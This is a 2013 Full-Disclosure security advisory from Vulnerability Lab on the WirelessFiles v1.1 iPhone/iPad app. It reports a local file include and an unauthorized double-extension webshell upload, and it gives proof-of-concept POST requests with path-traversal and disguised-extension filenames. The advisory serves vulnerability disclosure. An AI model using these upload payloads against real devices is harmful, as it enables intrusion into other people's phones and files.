[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] WirelessFiles v1.1 iPad iPhone - Multiple Web Vulnerabilities
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: [Full-disclosure] WirelessFiles v1.1 iPad iPhone - Multiple Web Vulnerabilities
- From: Vulnerability Lab <research@xxxxxxxxxxxxxxxxxxxxx>
- Date: Wed, 06 Feb 2013 15:03:08 +0100
Title:
======
WirelessFiles v1.1 iPad iPhone - Multiple Web Vulnerabilities
Date:
=====
2013-02-06
References:
===========
http://www.vulnerability-lab.com/get_content.php?id=847
VL-ID:
=====
848
Common Vulnerability Scoring System:
====================================
7.5
Introduction:
=============
This application starts a web server on your device and allows downloads and
uploads of any files from it using any browser on any
other computer or device. No cables, drivers or clients are necessary, just a
browser.
Right from this application you can send these files to any other application
ready to accept this file type. Or, you can send the
files to Wireless Files for further download to your computer. There is no
problems with national file names.
With this program You have web access to photos and videos on your device. Show
your photos in a nice Web Album on big screen without
cables and so on. For that, you need to enter your web-server from any computer
using LAN or WWAN address. Just type one of the
indicated addresses in the address bar of your browser (Internet Explorer,
Mozilla Firefox, Safari or any others). Also, you can start
WirelessFiles on one device, enter the web-server in your browser from another
device, and transfer your photos,for example,to the
first device, and then put them in Camera Roll. (The transfer of photos to and
from Camera Roll is available only in iOS 6 and up).
For all this to work, you need to have a working connection to the network
where your device is located.
For LAN,It usually works right on the spot, if you have a modem or Wi-Fi
router. If you have an AccessPoint (AP) connected to your
modem or router, you will need to switch the AP to the bridge mode in order to
join the local network and Wi-Fi network into one. In
case you experience problems with connection, contact a specialist – this can
be easily adjusted. It’s much harder with WWAN. It’s a
network access point provided by your cell network operator. As a rule, you
cannot connect your computer to your device using WWAN.
Still, if Internet access on your computer is provided by the same operator,
everything will get connected and running.
The application wouldn’t work in the background, so it switches off
autoblocking while running. Any unexpected calls will
interrupt your file transfer. By default, the application allows storing a
limited number of files – no more than 3 of them;
with the size of each not more than 10 MB. But you can remove all these
limitations at the minimal price of $0.99 / €0.89.
Second limitation - program show only 10 first photos in webalbum, remove this
limitation - $0.99 / €0.89.
Still, if something isn’t working, DO NOT buy removal of restrictions – this
will not improve operability of the system itself.
Pay ONLY in case everything works, and you need to store more than 3 files or
larger size. The application include basic protection
of the web-server from unauthorized access.
(Copy of the Homepage:
https://itunes.apple.com/de/app/wirelessfiles/id573161053 )
Abstract:
=========
The Vulnerability Laboratory Research Team discovered a local file include
vulnerability in the mobile WirelessFiles v1.1 app for the apple ipad & iphone.
Report-Timeline:
================
2013-02-06: Public Disclosure
Status:
========
Published
Affected Products:
==================
Apple AppStore
Product: WirelessFiles Application - (iPad & iPhone) 1.1
Exploitation-Technique:
=======================
Remote
Severity:
=========
High
Details:
========
A local file include web vulnerability via POST request method is detected in
the mobile WirelessFiles v1.1 app for the apple ipad & iphone.
The vulnerability allows remote attackers via POST method to inject local app
webserver folders to request unauthorized local webserver files.
1.1
The main vulnerbility is located in the upload file submit formular of the
webserver (http://192.168.0.10/) when processing to load a manipulated
filename via POST. The execution of the injected path or file request will
occur when the attacker is watching the file index listing.
1.2
Attackers can also unauthorized implement mobile webshells by using a double
filename extension (bild.js.php.jpg) when processing to upload (submit)
via POST request method. The attacker uploads a file with a double extension
and access the file in the secound step via directory webserver listing
to compromise the apple iphone or ipad.
Exploitation of the local file include web vulnerability does not require user
interaction but a low privileged user account (standard pass blank).
Successful exploitation of the local web vulnerability results in ipad or
iphone compromise via file include attack.
Vulnerable Application(s):
[+] WirelessFiles - ITunes or AppStore (Apple)
Vulnerable Module(s):
[+] File Upload via Submit (Web Server) [Remote]
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] Filename - Listing
[+] Webalbum Filename - Listing
Proof of Concept:
=================
1.1
The vulnerability can be exploited by remote attackers with low privileged
application user account and without required user interaction.
For demonstration or reproduce ...
Local File Include - PoC (POST)
POSTDATA =-----------------------------200962619920015
Content-Disposition: form-data; name="value";
filename="../../../../cmd>home>tmp.png" # < Include Path & File
Content-Type: image/png
--
Authorization=Digest username="ben37", realm="defaultRealm@xxxxxxxx",
nonce="2D2E8D09-6502-4266-B95E-28EB15CA8896", uri="/",
response="9942037c9ddae787f56cadcdb7570c89", qop=auth, nc=00000014,
cnonce="9cb396be6aa86cb3"
Review: Filename - (Upload) Listing
<tbody><tr class="styleZag">
<th scope="col" width="50%"><div align="left"> File Name</div></th>
<th scope="col" width="25%"><span>Date and Time</span></th>
<th scope="col" width="25%"><div align="right">Size</div></th>
</tr>
<tr class="styleRow">
<th scope="col" width="50%"><div align="left">
<a href="http://192.168.0.10/../../../../cmd>home>tmp.png?%00">
<../../../../cmd>home>tmp.png?%00">%20%20%20%20</a></div></th>
1.2
The vulnerability can be exploited by remote attackers with low privileged
application user account and without required user interaction.
For demonstration or reproduce ...
Unauthroized File Upload/Access (Webshell)
POSTDATA =-----------------------------200962619920015
Content-Disposition: form-data; name="value"; filename="hacking.js.php.jpg"
# < Include File with multiple file extensions
Content-Type: image/png
--
Authorization=Digest username="ben38", realm="defaultRealm@xxxxxxxx",
nonce="2D2E8D09-6502-4266-B95E-28EB15CA8896", uri="/",
response="9942037c9ddae787f56cadcdb7570c89", qop=auth, nc=00000014,
cnonce="9cb396be6aa86cb3"
Review: Filename - (Upload) Listing
<tbody><tr class="styleZag">
<th scope="col" width="50%"><div align="left"> File Name</div></th>
<th scope="col" width="25%"><span>Date and Time</span></th>
<th scope="col" width="25%"><div align="right">Size</div></th>
</tr>
<tr class="styleRow">
<th scope="col" width="50%"><div align="left">
<a href="http://192.168.0.10/hacking.js.php.jpg";><a
href=hacking.js.php.jpg></a>%20%20%20%20</a></div></th>
Risk:
=====
The security risk of the local file include web vulnerability and unauthorized
file upload/access bug are estimated as high(+).
Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri
(bkm@xxxxxxxxxxxxxxxxxxxxx)
Disclaimer:
===========
The information provided in this advisory is provided as it is without any
warranty. Vulnerability-Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have
been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential
or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor
licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com
- www.vulnerability-lab.com/register
Contact: admin@xxxxxxxxxxxxxxxxxxxxx - support@xxxxxxxxxxxxxxxxxxxxx
- research@xxxxxxxxxxxxxxxxxxxxx
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com
- news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab
- youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php -
vulnerability-lab.com/rss/rss_upcoming.php -
vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file
requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is
granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All
pictures, texts, advisories, sourcecode, videos and
other information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@xxxxxxxxxxxxxxxxxxxxx or
support@xxxxxxxxxxxxxxxxxxxxx) to get a permission.
Copyright © 2012 | Vulnerability
Laboratory
--
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: research@xxxxxxxxxxxxxxxxxxxxx
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/